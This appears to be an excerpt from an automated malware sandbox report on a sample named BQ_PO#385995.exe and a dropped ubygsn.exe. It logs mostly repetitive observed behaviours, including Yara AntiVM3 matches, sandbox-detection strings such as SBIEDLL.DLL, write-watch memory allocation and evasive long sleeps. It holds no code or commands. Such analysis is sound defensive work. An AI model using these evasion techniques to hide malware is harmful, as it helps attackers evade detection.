Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 0000000B.00000002.2281406478.0000000004CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2241224175.0000000004876000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BQ_PO#385995.exe PID: 2244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4976, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory allocated: 27608940000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory allocated: 27622400000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1980000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 33C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 31D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Memory allocated: 1010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Memory allocated: 2DC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Memory allocated: 2CE0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599016 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598907 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598774 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598647 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598313 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598184 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598061 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597560 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597337 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597119 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596797 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596133 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595813 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595563 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595326 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595216 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594989 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594722 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594110 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593735 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593610 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593485 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 3047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 6775 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6957 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2762 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8091 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1632 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Window / User API: threadDelayed 5085 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Window / User API: threadDelayed 4731 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5052 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5052 Thread sleep time: -34126476536362649s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 404 Thread sleep count: 3047 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 404 Thread sleep count: 6775 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6552 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -31359464925306218s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 7028 Thread sleep count: 5085 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 7028 Thread sleep count: 4731 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -599672s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -599344s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -599125s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -599016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -598907s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -598774s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -598647s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -598531s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -598313s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -598184s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -598061s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -597875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -597672s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -597560s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -597453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -597337s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -597234s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -597119s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -597015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -596906s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -596797s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -596687s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -596578s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -596250s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -596133s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -596031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -595922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -595813s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -595688s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -595563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -595453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -595326s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -595216s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -595110s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -594989s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -594844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -594722s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -594594s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -594469s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -594360s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -594235s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -594110s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -593985s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -593860s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -593735s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -593610s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe TID: 1616 Thread sleep time: -593485s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 599016 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598907 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598774 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598647 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598313 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598184 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 598061 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597560 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597337 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597119 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596797 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596359 Jump to behavior
